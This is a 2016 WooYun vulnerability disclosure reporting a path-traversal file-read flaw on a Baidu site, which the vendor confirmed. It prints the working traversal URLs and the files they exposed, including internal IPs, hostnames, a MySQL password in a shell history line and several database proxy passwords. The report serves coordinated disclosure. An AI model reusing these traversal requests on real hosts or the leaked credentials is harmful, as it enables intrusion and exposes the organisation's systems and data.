当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2016-0190419

漏洞标题:百度某站点任意文件遍历(泄漏多个数据库帐号密码)

相关厂商:百度

漏洞作者: lijiejie

提交时间:2016-03-29 16:02

修复时间:2016-05-13 20:00

公开时间:2016-05-13 20:00

漏洞类型:任意文件遍历/下载

危害等级:高

自评Rank:12

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2016-03-29: 细节已通知厂商并且等待厂商处理中
2016-03-29: 厂商已经确认,细节仅向厂商公开
2016-04-08: 细节向核心白帽子及相关领域专家公开
2016-04-18: 细节向普通白帽子公开
2016-04-28: 细节向实习白帽子公开
2016-05-13: 细节向公众公开

简要描述:

百度某站点任意文件遍历(泄漏数据库帐号密码等)

详细说明:

http://dz.baidu.com/en/..\\\..\\\..\\\..\\\..\\\..\\\..\\\..\\\..\\\..\\\/etc/sysconfig/network-scripts/ifcfg-eth1


可以读取任意本地文件。

dz.baidu.com.png

漏洞证明:

DEVICE=eth1
BOOTPROTO=static
IPADDR=10.26.186.23
NETMASK=255.255.255.0
ONBOOT=yes


得到IP地址是10.26.186.23。再读取/proc/self/environ:

MANPATH=:/usr/share/baidu/man
HOSTNAME=tc-dev-light01.tc.baidu.com
TERM=linux
SHELL=/bin/bash
HISTSIZE=1000
SSH_CLIENT=10.48.50.43 43745 22
SSH_TTY=/dev/pts/0
USER=work
LD_LIBRARY_PATH=/home/op/opbin/optool/lib:
LS_COLORS=no=00:fi=00:di=01;34:ln=01;36:pi=40;33:so=01;35:bd=40;33;01:cd=40;33;01:or=01;05;37;41:mi=01;05;37;41:ex=01;32:*.cmd=01;32:*.exe=01;32:*.com=01;32:*.btm=01;32:*.bat=01;32:*.sh=01;32:*.csh=01;32:*.tar=01;31:*.tgz=01;31:*.arj=01;31:*.taz=01;31:*.lzh=01;31:*.zip=01;31:*.z=01;31:*.Z=01;31:*.gz=01;31:*.bz2=01;31:*.bz=01;31:*.tz=01;31:*.rpm=01;31:*.cpio=01;31:*.jpg=01;35:*.gif=01;35:*.bmp=01;35:*.xbm=01;35:*.xpm=01;35:*.png=01;35:*.tif=01;35:
SUDO_USER=zhaojianqi
SUDO_UID=194560
OPHOME=/home/op
OPTOOL=/home/op/opbin/optool
MAIL=/var/spool/mail/zhaojianqi
PATH=/home/op/opbin/optool/bin:/home/op/opbin/optool/bin:/usr/kerberos/bin:/usr/local/bin:/bin:/usr/bin:/usr/X11R6/bin:/usr/share/baidu/bin:/opt/bin:/home/opt/bin:/DoorGod/bin:/opt/bin:/home/opt/bin
PWD=/home/work/php/sbin
INPUTRC=/etc/inputrc
EDITOR=vim
LANG=en_US
SUDO_COMMAND=/bin/bash
SHLVL=5
HOME=/home/work
LOGNAME=work
SSH_CONNECTION=10.48.50.43 43745 10.26.186.13 22
LESSOPEN=|/usr/bin/lesspipe.sh %s
PKG_CONFIG_PATH=/home/op/opbin/optool/lib/pkgconfig:/home/op/opbin/optool/lib/pkgconfig:
SUDO_GID=100000
G_BROKEN_FILENAMES=1
_=/home/work/php/bin/php-cgi
FPM_SOCKETS=/home/work/php/tmp/php-fpm.sock


得到主机名: HOSTNAME=tc-dev-light01.tc.baidu.com。.bash_history文件是存在的:

http://dz.baidu.com/en/..\\\..\\\..\\\..\\\..\\\..\\\..\\\..\\\..\\\..\\\/home/work/.bash_history


历史命令泄漏了MySQL密码:

/home/work/mysql/bin/mysql -hsh01-dba-chunlei-lapp-01.sh01 -P5100 -pGOGZ7Wpr8wrjHS6g -Dlightpay -ulightpay_r  --default-character-set=utf8


源代码中还泄漏了数据库配置信息,有较多的数据库密码:

http://dz.baidu.com/en/..\\\..\\\..\\\..\\\..\\\..\\\..\\\..\\\..\\\..\\\/home/work/phpui/conf/bdDBProxyConfig.class.php
  /**
     * DBProxy集群的机器列表、访问集群时所用的用户名、密码、端口号、失败重试次数
     * @var array
     */
    static $arrDBProxyServer = array(
        self::DBPROXY_OPENPLATFORM_INDEX => array(    //open-platform dbproxy集群
            'username' => 'developer_w',
            'password' => 'v60KOStx8cMQrv60',
            'port' => 6014,
            'jx' => array(
                '10.46.7.20',
                '10.46.7.20',
            ),
            'tc' => array(
                '10.42.8.18',
                '10.42.8.18',
            ),
        ),
        self::DBPROXY_OPENPLATFORM_READONLY_INDEX => array(  //open-platform dbproxy集群
            'username' => 'openplatform_r',
            'password' => 'oY3DHhmW1BFfkUYy',
            'port' => 5352,
            'jx' => array(
                '10.202.95.49',
            ),
            'tc' => array(
                '10.202.95.49',
            ),
        ),
其余省略

修复方案:

正确处理path

版权声明:转载请注明来源 lijiejie@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:15

确认时间:2016-03-29 19:53

厂商回复:

感谢对百度安全的关注

最新状态:

暂无

漏洞评价:

评价

  1. 2016-03-29 16:08 | 猪猪侠 认证白帽子 ( 核心白帽子 | Rank:4773 漏洞数:367 | 你都有那么多超级棒棒糖了,还要自由干吗?)

    看标题就好厉害啊

  2. 2016-03-29 16:08 | Looke ( 普通白帽子 | Rank:1273 漏洞数:158 | Shell)

    这节奏就是快啊

  3. 2016-03-29 16:09 | 带我玩 ( 路人 | Rank:16 漏洞数:8 | 带我玩)

    看标题就好厉害啊

  4. 2016-03-29 16:09 | 疯狗 认证白帽子 ( 实习白帽子 | Rank:44 漏洞数:2 | 阅尽天下漏洞,心中自然无码。)

    这是为啥,为啥啊??

  5. 2016-03-29 16:11 | netwind ( 普通白帽子 | Rank:250 漏洞数:41 | 挖掘漏洞为乐趣)

    lijiejie进入开挂模式了

  6. 2016-03-29 16:12 | 举起手来 ( 核心白帽子 | Rank:1811 漏洞数:188 | 准备好,举起手来!)

    越来越看不懂了,什么奇葩都有

  7. 2016-03-29 16:12 | 浩天 认证白帽子 ( 普通白帽子 | Rank:925 漏洞数:80 | 哈!躁起来!)

    加入tangscan豪华套餐

  8. 2016-03-29 16:34 | 习总夸我好青年 ( 路人 | Rank:2 漏洞数:1 | 刚来的,请多关照)

    lijiejie进入开挂模式了

  9. 2016-03-29 16:37 | JutaZ ( 实习白帽子 | Rank:91 漏洞数:13 | 少壮不努力老大徒伤悲)

    必有神器出世

  10. 2016-03-29 16:44 | Arrow ( 实习白帽子 | Rank:42 漏洞数:14 )

    开挂了今天

  11. 2016-03-29 16:51 | 随风的风 ( 普通白帽子 | Rank:244 漏洞数:91 | 微信公众号:233sec 不定期分享各种漏洞思...)

    李姐姐开挂了。。

  12. 2016-03-29 18:11 | 雅柏菲卡 ( 普通白帽子 | Rank:1285 漏洞数:257 | 雙魚座聖鬥士雅柏菲卡)

    李姐姐好棒。